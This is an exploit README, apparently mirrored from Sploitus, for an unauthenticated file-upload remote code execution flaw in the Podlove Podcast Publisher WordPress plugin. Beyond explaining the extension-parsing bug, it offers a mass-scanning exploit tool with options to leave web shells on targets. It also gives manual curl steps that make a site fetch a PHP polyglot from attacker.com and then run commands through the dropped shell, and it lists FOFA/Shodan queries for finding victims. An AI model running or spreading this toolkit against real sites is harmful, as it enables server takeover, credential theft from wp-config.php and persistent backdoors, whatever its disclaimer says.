Share
## https://sploitus.com/exploit?id=7EB20766-CE15-52F8-8606-681C9D45AAAF
CVE-2026-13001 โ Podlove Podcast Publisher Unauthenticated File Upload RCE
is_image() vs extract_file_extension() Mismatch โ PHP Polyglot Upload
---
## Overview
**CVE-2026-13001** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Podlove Podcast Publisher** WordPress plugin versions **โค 4.5.1**.
The vulnerability exploits a mismatch between two internal functions that parse file extensions differently:
- **`is_image()`** uses `basename()` which **includes query strings** โ URL `shell.php?.gif` appears as `.gif` โ
(valid image)
- **`extract_file_extension()`** uses `parse_url()` path only โ returns `.php` โ file saved with `.php` extension ๐จ
Attackers upload **GIF89a PHP polyglots** (valid GIF header + embedded PHP) that pass image validation but execute as PHP when accessed.
### Affected Versions
| Version | Status |
|---|---|
| โค 4.5.1 | Vulnerable |
| 4.5.2+ | Patched |
> **Discovered by:** Talal Nasraddeen via Wordfence (July 14, 2026)
---
## Vulnerability Mechanism
### Root Cause
```php
// is_image() โ uses basename() which includes query string
function is_image($url) {
$ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() โ "shell.php?.gif" โ ext = "gif" โ
BYPASSED
```
```php
// extract_file_extension() โ uses parse_url() path only
function extract_file_extension($url) {
$path = parse_url($url, PHP_URL_PATH);
return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() โ "/shell.php" โ ext = "php" ๐จ SAVED AS .php
```
### Attack Flow
```
1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() validates .gif extension โ PASS
4. Plugin downloads file โ saves as test_original.php in cache/
5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
6. PHP executes โ RCE
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target
python cve_2026_13001.py -t target.com
# Mass scan
python cve_2026_13001.py -f targets.txt -o shells.txt
# Custom payload URL
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif
# Debug mode, leave shells
python cve_2026_13001.py -t target.com --debug --no-cleanup
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE URLs to file
--payload-url URL hosting the PHP polyglot (default: GitHub raw)
--threads Concurrent workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every HTTP request
-v, --verbose Verbose output
```
---
## Proof of Concept
### Single Target
```bash
$ python cve_2026_13001.py -t podcast-site.com
```
```
Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8
Host : podcast-site.com
Podlove : YES v4.5.1
Upload : YES
RCE : YES
Shell : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
Output : uid=33(www-data) gid=33(www-data)
Time : 4.2s
```
### Mass Scan
```
Targets: 500 | Threads: 30
Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif
[RCE] podcast-vuln-01.com https://podcast-vuln-01.com/wp-content/cache/podlove/...
[150/500] 30% | Det:42 RCE:8
```
### Manual Exploitation
**Step 1 โ Host a polyglot shell**
```php
// shell.php โ save and host on your server
GIF89a
```
**Step 2 โ Hex-encode the URL with bypass**
```bash
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
```
**Step 3 โ Trigger the cache download**
```bash
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
```
**Step 4 โ Access the shell**
```bash
# Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
```
---
## FOFA / Shodan
```
FOFA: body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"
```
---
## Impact
Successful exploitation yields **remote code execution as the web server user**:
- Extract `wp-config.php` โ database credentials
- Access all WordPress content, users, and plugin data
- Deploy persistent backdoors
- Pivot to internal networks
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress/podlove-podcast-publisher-451-unauthenticated-arbitrary-file-upload-via-podlove-image-cache-url-parameter) |
| Podlove Security Release | [podlove.org](https://podlove.org/blog/security-release-cve-2026-13001/) |
| NVD Entry | [CVE-2026-13001](https://nvd.nist.gov/vuln/detail/CVE-2026-13001) |
| PoC by Raimu0x19 | [GitHub](https://github.com/Raimu0x19/CVE-2026-13001) |
| Researcher | Talal Nasraddeen |
---
Not affiliated with Podlove.